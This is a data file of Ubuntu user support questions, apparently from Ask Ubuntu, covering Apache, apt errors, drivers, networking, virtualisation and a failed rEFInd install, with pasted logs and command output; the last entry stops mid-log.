490370	what all do i need with my apache server	i was wondering what all extra i have to install on top of apache2 . my websites are running some javascript , css , and some jquery stuff . does apache come with everything necessary to run a website like this ? my searches have come back with little success so that is why i am turning my attention here . note* cgi-bin is in the '/usr/lib/cgi-bin ' everything else is in '/var/www ' this includes index.html and the css , imgs , js directories .
490371	release configuration problem with synaptic package manager	i recently updated my ubuntu 10 ( lucid ) to 14 ( trusty ) . now the synaptic package manager refuses to start saying : e : the value 'lucid ' is invalid for apt : :default-release as such a release is not available in the sources e : _cache- > open ( ) failed , please report . i tried to find such a reference in /etc , /var and my home folder , but found none fixing the problem . does anyone can help ? thanks in advance , edit : i want to make clear i already searched the most obvious configuration files like /etc/apt/source.list and ubuntu software center works correctly ( even if apt based too ) . anyway , here is the apt source.list : # deb cdrom : [ ubuntu-gnome 14.04 lts _trusty tahr_ - release amd64 ( 20140416.2 ) ] / trusty main multiverse restricted universe deb-src http : //archive.ubuntu.com/ubuntu trusty main multiverse restricted universe # added by software-properties deb http : //ftp.free.org/mirrors/archive.ubuntu.com/ubuntu/ trusty restricted main deb-src http : //ftp.free.org/mirrors/archive.ubuntu.com/ubuntu/ trusty multiverse universe restricted main # added by software-properties deb http : //ftp.free.org/mirrors/archive.ubuntu.com/ubuntu/ trusty universe deb http : //ftp.free.org/mirrors/archive.ubuntu.com/ubuntu/ trusty multiverse deb http : //extras.ubuntu.com/ubuntu trusty main deb-src http : //extras.ubuntu.com/ubuntu trusty main deb http : //ftp.free.org/mirrors/archive.ubuntu.com/ubuntu/ trusty universe multiverse deb http : //ftp.free.org/mirrors/archive.ubuntu.com/ubuntu/ trusty restricted deb http : //ftp.free.org/mirrors/archive.ubuntu.com/ubuntu/ trusty-updates main restricted deb-src http : //ftp.free.org/mirrors/archive.ubuntu.com/ubuntu/ trusty-updates multiverse universe restricted main # added by software-properties deb http : //ftp.free.org/mirrors/archive.ubuntu.com/ubuntu/ trusty-updates universe deb http : //ftp.free.org/mirrors/archive.ubuntu.com/ubuntu/ trusty-updates multiverse deb http : //ftp.free.org/mirrors/archive.ubuntu.com/ubuntu/ trusty-backports main restricted universe multiverse deb-src http : //ftp.free.org/mirrors/archive.ubuntu.com/ubuntu/ trusty-backports main restricted universe multiverse # added by software-properties deb http : //ftp.free.org/mirrors/archive.ubuntu.com/ubuntu/ trusty-security main restricted deb-src http : //ftp.free.org/mirrors/archive.ubuntu.com/ubuntu/ trusty-security multiverse universe restricted main # added by software-properties deb http : //ftp.free.org/mirrors/archive.ubuntu.com/ubuntu/ trusty-security universe deb http : //ftp.free.org/mirrors/archive.ubuntu.com/ubuntu/ trusty-security multiverse deb http : //archive.canonical.com/ubuntu trusty partner deb-src http : //archive.canonical.com/ubuntu trusty partner
490374	how to retrieve the data from ubuntu one to windows 7 ?	i have downloaded the zip file from ubuntu one for my windows 7 and when i open the exe file then it asks for id and password and after i enter them nothing gets displayed and the window gets closed . so how can i retrieve my data ?
490380	lshw and modinfo show diff versions of driver	i 'm using ubuntu 12.04 on a server that has an intel 10ge nic . i wanted to upgrade the driver for the nic which is called ixgbe . i downloaded the latest version , performed make and make install on driver source followed by modproc ixgbe . now i see two different versions . lshw still displays the older version ( 3.13.10-k ) while modinfo shows the new version ( 3.21.2 ) that i 'd upgraded to . i 'm rather new with linux and ca n't understand this discrepancy . following are slightly edited outputs of lshw and modinfo . $ sudo lshw -c network [ sudo ] password for gaurav : *-network:0 description : ethernet interface product : ethernet controller 10-gigabit x540-at2 vendor : intel corporation physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth2 version : 01 serial : a0:38:9f:38 : cc : ec capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi msix pciexpress bus_master cap_list rom ethernet physical tp 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=ixgbe driverversion=3.13.10-k duplex=full firmware=0x80000389 ip=xx.xx.xx.xx latency=0 link=yes multicast=yes port=twisted pair resources : irq:25 memory : fb200000-fb3fffff memory : fb1fc000-fb1fffff memory : fb100000-fb17ffff memory : f0000000-f00fffff memory : f0100000-f01fffff *-network:1 description : ethernet interface product : ethernet controller 10-gigabit x540-at2 vendor : intel corporation physical id : 0.1 bus info : pci @ 0000:01:00.1 logical name : eth3 version : 01 serial : a0:38:9f:38 : cc : ee capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi msix pciexpress bus_master cap_list rom ethernet physical tp 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=ixgbe driverversion=3.13.10-k firmware=0x80000389 latency=0 link=no multicast=yes port=twisted pair resources : irq:24 memory : fb600000-fb7fffff memory : fb5fc000-fb5fffff memory : fb400000-fb47ffff memory : f0200000-f02fffff memory : f0300000-f03fffff $ lsmod | grep ixgbe ixgbe 236655 0 dca 15232 1 ixgbe ptp 18627 2 e1000e , ixgbe mdio 13807 1 ixgbe $ modinfo ixgbe filename : /lib/modules/3.11.0-24-generic/kernel/drivers/net/ethernet/intel/ixgbe/ixgbe.ko version : 3.21.2 license : gpl description : intel ( r ) 10 gigabit pci express network driver author : intel corporation , < linux.nics @ intel.com > srcversion : bf07a1334753c2c8bfaa989
490381	guest connection keeps breaking for internet	i mention the guest connection because i have no problem when connecting at home on my domestic network . this is a wireless institutional account which i was given a password to connect to . it 's the type that -when working properly- logs you to the network but only asks for a password when opening the browser . the problem is that every now and then , sometimes it can be 10 min after , or sometimes a couple of hours it logs me off and wo n't let me connect to it again until i restart the computer . in addition , if i open edit connections and delete the connection to start over , the computer wo n't find it again but gives me the message : ( 32 ) connection could not be found . does anyone know any configuration settings that will make it more stable , in the sense that the connection does n't break , or at least in which i can recover it without needing to restart the computer ? i 'm using ubuntu 14.04 . thanks in advance .
490385	read a part of massive online csv file using its url from command line	is there any way that i can read a few lines of a massive online csv file using its url from command line before i am going to download it ?
490390	will upgrading windows 7 to 8 affect ubuntu 10.04 ( dual-boot ) ?	i have two operating systems windows 7 ( 32bit ) and ubuntu 10.04 ( 32bit ) ( dual boot ) in my pc . i want to upgrade my windows 7 to windows 8 . but i do n't know if this process may affect my ubuntu 10.04 . i have 100 gb dedicated to windows , 95 gb to ubuntu and 4 gb swap partition . if there is any problem how can i fix this ?
490394	apache restart not working properly ?	i 'm newbie to ubuntu . and i 'll install the lamp and phpmyadmin its also working fine , but my problem is when i trying to restart the service of apache2 is not restarting good , its says looks like , ubuntu @ p3-sd1 : ~ $ sudo service apache2 restart restarting web server apache2 [ tue jul 01 18:59:36.992771 2014 ] [ alias : warn ] [ pid 23365 ] ah00671 : the alias directive in /etc/phpmyadmin/apache.conf at line 3 will probably never match because it overlaps an earlier alias . [ ok ] then i try check the http : //localhost and http : //localhost/phpmyadmin and phpinfo ( ) all of them working fine ... i 'm trying to fix , and remove the line 3 of following directory /etc/phpmyadmin/apache.conf at line 3 alias /phpmyadmin `` /usr/share/phpmyadmin/ '' then apache2 restart is looking good , looks like ubuntu @ p3-sd1 : ~ $ sudo service apache2 restart restarting web server apache2 [ ok ] but , http : //localhost/phpmyadmin/ not working its says not found the requested url /phpmyadmin/ was not found on this server . apache/2.4.7 ( ubuntu ) server at localhost port 80 note : if i add the alias ( alias /phpmyadmin `` /usr/share/phpmyadmin/ '' ) means phpmyadmin working fine . next , gksu gedit /etc/apache2/apache2.conf following line add end of the file . include /etc/phpmyadmin/apache.conf add , this one also but not working include /etc/phpmyadmin/apache.conf thanks in advance .
490403	ubuntu does n't fill the entire screen	ubuntu fills all of my screen except for the very left . there is a space between the edge of ubuntu and the edge of the screen about 1 cm wide . where should i go to fix this ? if possible , give answers in very dumbed down language so maybe i can understand it .
490408	ca n't install java jdk in ubuntu 12.04 : broken packages	i try entering this to install java jdk sudo apt-get install openjdk-7-jdk it responds with this reading package lists ... done building dependency tree ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : openjdk-7-jdk : depends : openjdk-7-jre ( = 7u55-2.4.7-1ubuntu1~0.12.04.2 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . i have no idea how to deal with this .
490413	why do my dns settings keep having to be reset ?	i have a laptop that i use on my home lan , my work lan and my work vpn via my home lan through openconnect . in addition , i also sometimes use torguard , which is a openvpn connection . all of these are configured via networkmanager in nm-applet . if on my work lan or work vpn , i must have the private dns server and search domain because there are a number of servers that only resolve to hostnames within my network and have a standardized dns suffix . this is set in the nm-applet settings for my work vpn and i have a separate ethernet connection profile for the work lan . i am in a situation where regardless of what network i am currently on , i find that at seemingly random but often times i am unable to resolve hostnames and lose my search domain suffix if on my work vpn/lan . to fix the problem , and this fix works every time , i have to manually perform a sudo service dnsmasq restart . this resets my dns servers and search domain to what they are supposed to be and everything works correctly again , for a few minutes . i keep having to restart the dnsmasq service to fix the domain resolution problem . using ubuntu 14.04 lts in a dell latitude e6540 . the ethernet controller is intel corporation ethernet connection i217-lm ( rev 04 ) and the wifi card intel速 centrino速 advanced-n 6235 . i 've been asked to provide my network devices . i highly doubt hardware is the problem here , but i will humor you . there is one network card and one wifi card . both work perfectly with the exception of having to restart the dnsmasq service repeatedly to get dns resolution working . i sometimes use the wifi , the bluetooth does work but i do n't use it for networking . i usually am using ethernet .
490414	can i install ubuntu 64bit mac ( amd64 ) on a amd 64 dual core 4200+	please clarify that 64bit mac ( amd64 ) runs only on mac books or it can install on any system having amd64 processor . i am using amd x2 64 bit 4200+ processor with dual cores ... ... ..thanks for info
490415	hosting 12.04 guest on 14.04 server with kvm & libvirt	i 've been pulling my hair out trying to get ubuntu 12.04lts server ( 64bit ) working under a standard kvm/libvirt setup on ubuntu 14.04 . i can create a new virtual machine using virt-manager and run through the installation process from an iso image . however , when i reboot on completion the new virtual machine hangs after fsck . on trying repeatedly and fiddling with disk bus options it now gets a little further and hangs on `` starting configure network device '' . during the install i kept all vm options as vanilla for ubuntu 12.04 and selected packages for lamp + ssh server .
490416	how to reset ubuntu to state just after installing ( in virtual box )	i have been using ubuntu in virtual box . i created a virtual hdd of fixed size . but now the disk is full . i do n't know how ( it had 10 gb space ) . i need to reset the ubuntu to initial state as if just after installing so that i can go on with my works . is there anyway to do that rather than reinstalling using the disk again ? i do n't want to make the disk dynamic .
490420	how to launch a script inside a vm from the host ?	environment presentation : host machine : ubuntu 12.04 lts guest machine : ubuntu 12.04 lts . inside this vm , a my_program.py exists . virtualization system : virtualbox 4.3 question : is there any way to launch my_program.py from the host machine ?
490424	problem with access to mounted drive	i can not make my newly mounted hdd work properly . first and foremost , i can not access it to read and write any file or folder even after changing the privileges to +775 and even +777 ( though i can see the files and directories all right ) . this is the biggest problem . secondly and this is a more theoretical question , when i am trying to unmount it , the system reports that the drive is busy . fuser command shows the drive is busy by a process with c post-fix ( 2177c ) . what does this `` c '' means ? i did manage to umnount the hdd using lazy umount thought . i understand that i am doing smth wrong here . could you please indicate what my mistake is - i can not figure what can be wrong here using the leads available from google search . i put in the list of commands i used to mount the hdd and chmod the permissions . just for a reference - i am doing all that using ssh . xxx @ 123 ~ $ mkdir hddmount xxx @ 123 ~ $ sudo mount /dev/sda1 /home/xxx/hddmount xxx @ 123 ~ $ sudo chmod 775 /home/xxx/hddmount xxx @ 123 ~ $ pwd /home/xxx xxx @ 123 ~ $ ls desktop hddmount downloads xxx @ 123 ~ $ cd hddmount pi @ 123 ~/hddmount $ ls autorun.inf seagate seagateexpansion.ico setup.exe warranty.pdf xxx @ 123 ~/hddmount $ mkdir test mkdir : can not create directory `test ' : permission denied xxx @ 123 ~/hddmount $ mkdir in sudo mode results in : xxx @ 123 ~/hddmount $ sudo mkdir test mkdir : can not create directory `test ' : operation not permitted why does sudo can not override permissions - this is the third question is am struggling with . output of df -h : /dev/sda0 141g 46g 89g 34 % / none 4.0k 0 4.0k 0 % /sys/fs/cgroup udev 1.5g 4.0k 1.5g 1 % /dev tmpfs 297m 1.5m 295m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 1.5g 560k 1.5g 1 % /run/shm none 100m 12k 100m 1 % /run/user /dev/sda1 1.9t 150m 1.9t 1 % /home/xxx/hddmount
490427	does anyone know of any alternatives to recuva for file recovery ?	i was using recuva to find pictures and videos on a windows xp hard drive , but i keep getting an internal error message . does anyone know of an alternative program for recovering broken and damaged files ?
490428	12.04 : kernel panic - not syncing : attemped to kill the idle task !	my parents got this error on their machine , so i 'm not sure what triggered it . my dad says it just happens randomly . it apparently happens every couple of days , but this is the first time i 've been told about it . the computer is pretty old and is low on hard drive space , which i think might be the issue . here 's the entire output : http : //i.imgur.com/mhte2q0.jpg http : //i.imgur.com/cyumvy2.jpg if you ca n't read that , let me know .
490429	turn off the wireless card on each boot	i tried to disable the wireless functions at boottime like lekensteyn described here : how can i keep a wireless card 's radio powered off by default ? but it keeps starting enabled after a reboot ! i added the command to /etc/rc.local by running sudo nano /etc/rc.local used the arrow keys / page up/down keys to navigate to the line before exit 0 and add rfkill block wifi , so that the file end like this : # by default , this script does nothing rfkill block wifi # for debugging : rfkill list > /tmp/wifi-state.txt exit 0 now in /tmp/wifi-state.txt i can see that it was blocked right after the call in rc.local but if i call rfkill list on the console , it shows that wifi is enabled again : 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : hci0 : bluetooth soft blocked : yes hard blocked : no additional info : i added this to disable bluetooth it works fine : rfkill block bluetooth and sudo rfkill block wifi works fine on the console
490430	how to add music to an ipod nano 4th generation	i 've been trying to sync music to my black ipod nano 4th generation ( model mb754 ) with ubuntu 14.04 64-bit . i 've tried using clementine and rhythmbox to add music . the music syncs fine and appears in my ipod 's music library , but when selecting the music , the ipod displays the track , but does n't play and gets stuck at 0:00 . it correctly displays the length of the song and other information ( except album art , which i guess is an option i have to set ) . it seems to be a format issue , but i 'm not sure . i 've set clementine to convert the music to mp3 before syncing . what could the problem be ?
490432	installation of gpac	i 'm trying to install gpac on my pc , i 'm running ubuntu 12.04 lts , 32-bit . the problem i have is when i try to install the gpac package i get the following error : gcc : error : unrecognised option â -- warn-commonâ make [ 1 ] : * [ libgpac.so ] error 1 make [ 1 ] : leaving directory `/usr/local/src/gpac/src' make : * [ lib ] error 2 can anyone help me with this because i ca n't seem to find a solution
490435	ubuntu 14.04 + virtual box and coreldraw	i have win7/ubuntu dual boot . i have no reason to use win anymore , except coreldraw which is a must , i 'm bored of switching between these two . my plan is to install ubuntu on 24gb ssd ( 20gb for /root , 4gb for /swap ) , and 500gb sata to set as /home . after that , need to install virtualbox , set up win7 and install coreldraw . is that possible ? important thing is that virtualbox + windows + coreldraw must be on /home , because theres only 20gb on /root .
490436	problem to use µtorrent	i 'm with problem to install µtorrent i used this command in this link and appear this message i want to make download files in thepiratebay.se but the most files it ca n't be make using bit torrent in magnet links . there other way to install magnet links ? or how can i fix this problem with my µtorrent ?
490444	ubuntu linux 13.10 usb boot error	while i was trying to boot from my usb . after entering the choice of install ubuntu alongside windows . then this error shows up : given below and it again restarts nothing from linux installation shows up . *starting mount network filesystems *stopping mount network filesystems cpid : exiting speech-dispatcher disabled : edit /etc/default/speech-dispatcher asking all remaining processess
490445	how to add lxc containers to host 's dns so that getaddrinfo ( ) can resolve them ?	i 'm running lxc containers on ubuntu 12.04 with a 3.8 kernel . the containers are on a host-only network , so their addresses are managed by dnsmasq . is there a way to configure the host so that getaddrinfo ( ) ( on the host ) can resolve container names ? ( i know there ways to resolve container names from the shell , but i 'm specifically looking for something that works with getaddrinfo ( ) ) .
490448	hp ml350p gen 8 - grub error	i have a hp proliant ml350p gen 8 server . no matter how i partition the drives , when it gets to the grub installer , it fails . it is seeing the drive array as scsi6 , sdb - ( a ) has anyone successfully installed ubuntu on a proliant ml350p gen 8 with a smart array p420i controller ? ( b ) should ubuntu see the logical drive as sda ? thanks
490449	nvidia installing	trying to install nvidia .run drivers to ubuntu 14.04 lts desktop version but x server is up and has a lock to prevent concurent installations . i think i should switch in mode 1 or so to shut off x11 but i can not manage to do so ... having read lots of documentation saying switch to console mode ctrl-alt-f1 , ... , but when i kill x11 process , it re-starts automaticaly , whith no end
490453	help with usb blue yeti mic	my usb blue yeti mic is unrecognized by ubuntu 14.04 . i do n't know if it 's a fixable problem or if the yeti is completely incompatible , but i really need this to work . i have no clue where to even get started to try fixing this problem , i 'm somewhat of a ubuntu noob . any help would be greatly appreciated . i plugged the mic into several different usb ports , and nothing . the only place that the mic appears is when i type in lsusb , and i only figured it out entering that command with it in and with it out . i launched linux mint 17 in the usblive and the mic was also unrecognized . i will try it in other versions of ubuntu and mint and if it appears in one of those versions i will post it . thanks ! edit : after running `` dmesg '' i found a trace of my mic ! output : [ 1.926247 ] usb 5-1.1 : new full-speed usb device number 3 using xhci_hcd [ 1.945981 ] usb 5-1.1 : new usb device found , idvendor=b58e , idproduct=9e84 [ 1.945986 ] usb 5-1.1 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 1.945989 ] usb 5-1.1 : product : yeti stereo microphone [ 1.945991 ] usb 5-1.1 : manufacturer : blue microphones [ 1.945993 ] usb 5-1.1 : serialnumber : rev8 [ 1.947842 ] input : blue microphones yeti stereo microphone as /devices/pci0000:00/0000:00:1c.4/0000:03:00.0/usb5/5-1/5-1.1/5-1.1:1.3/input/input17 [ 1.947938 ] hid-generic 0003 : b58e:9e84.0005 : input , hiddev0 , hidraw4 : usb hid v1.00 device [ blue microphones yeti stereo microphone ] on usb-0000:03:00.0-1.1/input3 system : intel i5 3570k 3.4 ghz ( 3.8 turbo ) corsair 8 gb 1600 mhz ddr3 asus gtx 650 ti 1gb gddr5 win 8.1 installed on : ssd ocz vertex 4 128 gb ubuntu 14.04 installed on : ssd crucial mx100 256 gb hdd 3tb seagate barracuda 7200rpm 6 gb/s sata cm storm scout mid tower gigabyte ga-z77x-d3h rev 1.1 ( mobo ) corsair cx 600
490457	memory consumption of chrome in ubuntu constantly increases	i have laptop with 8gb of memory . if i start ubuntu 14.04 freshly and open chrome with ~20 tabs ( that 's my regular usage ) and skype it consumes around 2.3gb of memory , which is perfect for me . now with time ( usually in some days ) that memory usage increases , and it becomes 5-6gb with same amount of chrome tabs without any additional programs opened . i noticed same behavior from chrome on windows 8 when i was using it quite some time ago , so are you guys having same problem with chrome ? is it possible to fix it somehow for not consuming so much memory , without restarting laptop every day ? because logically thinking , if 2.3gb of ram is enough now , why would it need +3 or +4gb additional after few days ?
490459	how to control specific location of conky	i 've got conky installed via conky manager and i 'm running the gotham theme . it looks great and i is really useful , but i 've run into an issue . it covers part of my background , making part of the conky widget hard to read . i 've read this ubuntu forums post on it , but i still ca n't get it to be aligned where i want it , about 50 pixels to the right . obviously that 's slightly annoying . i 've messed with the gap_x property , but i can not get it to work right . one would think that since positive numbers move it away from the current align position ( in my case right , ) negative numbers would move it closer in that direction . however , this is n't true apparently , as negative numbers seem to just be ignored . what can i do change the position ?
490462	how to make my secondary display not to overflow ?	my primary display resolution is 1920x1080 and my secondary display is 1366x768 ( both physically and in the settings ) . my o.s . is ubuntu 14.04 . i extend the desktop and my problem is that the content of the second display does n't match the display size . it overflows above and on the right . changing the resolution does n't fix the problem .
490463	how to cleanup/organize software sources list	i have been installing and deleting several ubuntu oses of different versions in vms and dual boots , but i do have a main ubuntu os that i never reformat . instead i use it as my primary os and kept updating it to the next version . but after several upgrades , apt-gets , and auto disabling of ubuntu from old sources , the list of my software sources has been cluttered . i would like to know if there are any way to optimize my software sources list without having to go through each entry one-by-one and might possibly accidentally remove important ones . thank you in advance .
490465	install gnu scientific library ( gsl ) on ubuntu 14.04 via terminal	i am trying to install gsl libraries on ubuntu 14.04 via terminal . i searched on google but i could n't find any command which can install it from the terminal but just through the ubuntu software center . how can it be installed via terminal ?
490467	how do i make s-video and rca ports on docking station work ?	i posted this on ubuntu forums , but it 's been five days and nobody 's responded yet , so i 'm asking here now . i have an hp elitebook 6930p with an en488aa docking station . there is no video coming out of either the s-video or yellow composite ports . i have the docking station connected to the proper power cable ( was a problem earlier ) : the lights come on and most ports work . i 've tested the vga , ps/2 , and usb ports and they work . i know it 's not a problem with the tv/vcr because i tried connecting it to multiple devices . ubuntu did n't even recognize when i plugged/unplugged the cables at all . the bios does n't show up at all on the tv either , and fn+f4 ( what they suggested trying in their troubleshooting guide ) did n't do anything . anyone have any idea what 's wrong ? edit : also know that it 's not the cable or cable type : i tried s-video to s-video , s-video to rca , and rca to rca
490468	add-apt-repository throws python error	trying to install the latest php5 packages and so i add the repo ( sudo add-apt-repository ppa : ondrej/php5 ) i need and this is the outcome : traceback ( most recent call last ) : file `` /usr/lib/python3.2/threading.py '' , line 740 , in _bootstrap_inner self.run ( ) file `` /usr/lib/python3/dist-packages/softwareproperties/ppa.py '' , line 141 , in run self.add_ppa_signing_key ( self.ppa_path ) file `` /usr/lib/python3/dist-packages/softwareproperties/ppa.py '' , line 234 , in add_ppa_signing_key tmp_export_keyring , signing_key_fingerprint , tmp_keyring_dir ) : file `` /usr/lib/python3/dist-packages/softwareproperties/ppa.py '' , line 186 , in _verify_fingerprint got_fingerprints = self._get_fingerprints ( keyring , keyring_dir ) file `` /usr/lib/python3/dist-packages/softwareproperties/ppa.py '' , line 178 , in _get_fingerprints output = subprocess.check_output ( cmd , universal_newlines=true ) file `` /usr/lib/python3.2/subprocess.py '' , line 516 , in check_output output , unused_err = process.communicate ( ) file `` /usr/lib/python3.2/subprocess.py '' , line 811 , in communicate stdout = _eintr_retry_call ( self.stdout.read ) file `` /usr/lib/python3.2/subprocess.py '' , line 456 , in _eintr_retry_call return func ( *args ) file `` /usr/lib/python3.2/encodings/ascii.py '' , line 26 , in decode return codecs.ascii_decode ( input , self.errors ) [ 0 ] unicodedecodeerror : 'ascii ' codec ca n't decode byte 0xc5 in position 92 : ordinal not in range ( 128 ) running on ubuntu 12.04 server
490472	how to make my ubuntu be a gateway / forward my wifi connection over a lan connection to a different machine	sooo , the question is : can someone please give me a neat step by step checklist i need to do to be able to 1 ) connect to a wireless connection 2 ) share ( bridge ? ) that connection via lan 3 ) have internet on my win7 desktop via lan as well ? for what it 's worth , i no longer have the default network manager and started using wicd network manager at some point ( probably due to aircrack~ng ) so i hope that 's not an issue . but if it does turn out to be an issue , i guess i can change it for one that lets me type in passwords as byte values and not just ascii letters & & gets the job done : ) so *nix gurus , please help a semi-noob out with this should-be-easy problem : ) edit : please do n't suggest i upgrade to a newer ubuntu , please ...
490474	problem with qtwebkit and qml in pyqt5 app ubuntu for devices ( ubuntu touch )	i 'm having problems with qtwebkit in ubuntu for devices ( nexus 10 ) when using pyqt5 , the webview element does n't show , and the application closes . but if i test the same .qml file with qmlscene it works , but the webview is on fullscreen size . if i comment the height and width lines the python app keeps running but with the screen in white . this is the testqt5.py file : import sys from pyqt5.qtcore import qurl from pyqt5.qtwidgets import qapplication from pyqt5.qtquick import qquickview app = qapplication ( sys.argv ) view = qquickview ( ) view.setsource ( qurl ( `` file : ///home/phablet/documents/guiwk.qml '' ) ) view.show ( ) app.exec ( ) guiwk.qml file : import qtquick 2.0 import qtwebkit 3.0 import ubuntu.components 0.1 mainview { width : units.gu ( 120 ) height : units.gu ( 80 ) rectangle { id : content anchors.fill : parent webview { height : content.height width : content.width id : webview url : `` http : //www.google.com '' } } } testqt5.desktop file : [ desktop entry ] encoding=utf-8 version=1.0 type=application terminal=false # exec=python3 /home/phablet/documents/testqt5.py exec=/usr/bin/qmlscene $ @ /home/phablet/documents/guiwk.qml icon=qmlscene name=testqt5 x-ubuntu-touch=true i run the app but it does n't show anything special in the log file at ~/.cache/upstart : creating surface at ( 0 , 64 ) with size ( 2560 , 1536 ) with title 'window 1'
490477	cant install libqt4-sql-psql on ubuntu precise unmet dependencies	could someone help me resolve this ? i tried most of the commands here .. but none of them worked how do i resolve unmet dependencies ? apt-get install the following packages have unmet dependencies : libqt4-sql-psql : depends : libqt4-sql ( = 4:4.8.1-0ubuntu4.8 ) but 4:4.8.2+dfsg-2ubuntu1~precise1~ppa5 is to be installed depends : libqtcore4 ( = 4:4.8.1-0ubuntu4.8 ) but 4:4.8.2+dfsg-2ubuntu1~precise1~ppa5 is to be installed e : unable to correct problems , you have held broken packages .
490478	how to remove bumblebee indicator ?	bumblebee indicator is enormous on my ( xfce4 ) panel . not sure why . have n't been able to figure out how to eliminate it . bumblebee preferences does n't have any option to remove it , and clicking the bumblebee indicator in the settings panel just puts on even more of them ! it 's included in the indicator plugin and then application indicators under that when i click to add/remove items to the panel . there 's no individual entry for it , that i can see . i found this askubuntu question which has a similar issue - but i ca n't seem to find the file that gets used for the bumblebee indicator ( not in /usr/share/bumblebee or /usr/share/bumblebee-ui )
490479	ubuntu server 12.04 apache httpd 2.2.22 mod_rewrite not working	i am trying to set up a distributed web farm using apache2 . before deploying the configuration to my other 3 servers , i wanted to get everything to work on the first one ( designated p-web-01 ) at 10.0.2.1 . i have multiple sites set up through virtual hosts , and the different domain names are all working properly . however , my problem is with apache_mod_rewrite , where i 'm attempting to set up a url that looks like this : http : //example.com/firstvariable/secondvariable/thirdvaraible and have it read by the php script ( index.php ) as http : //example.com/index.pp ? a=firstvariable & b=secondvariable & c=thirdvariable . the system also has to be set up in a way where the mod_rewrite ignores internal file names and directories , as they are proxied to the external site ( for security purposes ) through the script . i had this script running on an iis7 server for a while , and it worked perfectly fine . also , i have followed the whole a2enmod mod_rewrite , which outputted success . i enabled allowoverride all in apache2.conf , and set up the sites .htaccess file in the site 's root directory , and had it say : rewriteengine on rewriterule ^index.php $ index.html which still did nothing .
490480	why are there different version numbers on x.org	some websites say the latest version of x.org is 7.4 , some say 11 , and some say 1.15.1 . these numbers are completely different from each other , yet it 's the same version . can anyone explain which number means what and why when installing drivers it says install on x.org 6.9 or later but after installing it says i have 1.15 ?
490481	downloads & updates fail , error message says esp missing	esp seems to be lost . where can i get it , where and how can i install it ? i sure hope someone here can offer suggestions for a fix . to start , i 'm running ubuntu 14.04 on my dell inspiron 6605 desktop , with windows 8 on another partition . the problem , detailed below , started when i tried to upgrade from ubuntu 13.04 to 13.10 ; i had all sorts of trouble and went back to 13.04 . i was hoping that an installation of 14.04 would correct my problem , but it do not . so , here 's the problem : when i try to download software ( via either the software center or sysnaptic ) or try to update using the software updater , i always get a message that the update or download failed . the programs are ( apparently ) actually loaded but the the error message says installation failed . here is the failure message : installarchives ( ) failed : ( reading database ... ( reading database ... 5 % ( reading database ... 10 % -- -.deleted % increases to save space in this post -- - ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 316143 files and directories currently installed . ) removing bovo ( 4:4.13.0-0ubuntu1 ) ... processing triggers for man-db ( 2.6.7.1-1 ) ... processing triggers for menu ( 2.1.46ubuntu1 ) ... processing triggers for hicolor-icon-theme ( 0.13-1 ) ... processing triggers for bamfdaemon ( 0.5.1+14.04.20140409-0ubuntu1 ) ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for desktop-file-utils ( 0.22-1ubuntu1 ) ... processing triggers for gnome-menus ( 3.10.1-0ubuntu2 ) ... processing triggers for mime-support ( 3.54ubuntu1 ) ... setting up refind ( 0.7.7-1 ) ... /var/lib/dpkg/info/refind.postinst : line 4 : efibootmgr : command not found installing refind on linux ... . the esp does n't seem to be mounted ! trying to find it ... . ./install.sh : line 704 : dmraid : command not found // does n't seem to be on a vfat filesystem . the esp must be mounted at //boot or //boot/efi and it must be vfat ! aborting ! dpkg : error processing package refind ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : refind error in function : setting up refind ( 0.7.7-1 ) ... /var/lib/dpkg/info/refind.postinst : line 4 : efibootmgr : command not found installing refind on linux ... . the esp does n't seem to be mounted ! trying to find it ... . ./install.sh : line 704 : dmraid : command not found // does n't seem to be on a vfat filesystem . the esp must be mounted at //boot or //boot/efi and it must be vfat ! aborting ! dpkg : error processing package refind ( -- configure ) : subprocess installed post-installation script returned error exit status 1 so ! then i tried installing refind via terminal and got pretty much the same error message : jim @ jim-inspiron-660s : ~ $ $ sudo apt-add-repository ppa : rodsmith/refind $ : command not found jim @ jim-inspiron-660s : ~ $ sudo apt-add-repository ppa : rodsmith/refind [ sudo ] password for jim : a graphical boot manager for efi- and uefi-based computers , such as all intel-based macs and recent ( most 2011 and later ) pcs . more info : -- -rodsmith/+archive/refind link -- - press [ enter ] to continue or ctrl-c to cancel adding it gpg : keyring `/tmp/tmpdoqf82gq/secring.gpg ' created gpg : keyring `/tmp/tmpdoqf82gq/pubring.gpg ' created gpg : requesting key 9122e0c2 from hkp server keyserver.ubuntu.com gpg : /tmp/tmpdoqf82gq/trustdb.gpg : trustdb created gpg : key 9122e0c2 : public key `` launchpad ppa for roderick smith '' imported gpg : total number processed : 1 gpg : imported : 1 ( rsa : 1 ) ok jim @ jim-inspiron-660s : ~ $ sudo apt-get update ign link : //dl.google.com stable inrelease hit link : //dl.google.com stable release.gpg -- -again i 'm deleting much of the download log from this post to save space but i still have it all on file. -- - preparing to unpack ... /sbsigntool_0.6-0ubuntu7_amd64.deb ... unpacking sbsigntool ( 0.6-0ubuntu7 ) ... preparing to unpack ... /refind_0.8.2-0ppa3_amd64.deb ... unpacking refind ( 0.8.2-0ppa3 ) over ( 0.7.7-1 ) ... processing triggers for man-db ( 2.6.7.1-1 ) ... setting up efibootmgr ( 0.5.4-7ubuntu1 ) ... setting up sbsigntool ( 0.6-0ubuntu7 ) ... setting up refind ( 0.8.2-0ppa3 ) ... fatal : could n't open either sysfs or procfs directories for accessing efi variables . try 'modprobe efivars ' as root . installing refind on linux ... . the esp does n't seem to be mounted ! trying to find it ... . // does n't seem to be on a vfat filesystem . the esp must be mounted at //boot or //boot/efi and it must be vfat ! aborting ! dpkg : error processing package refind ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : refind e : sub-process 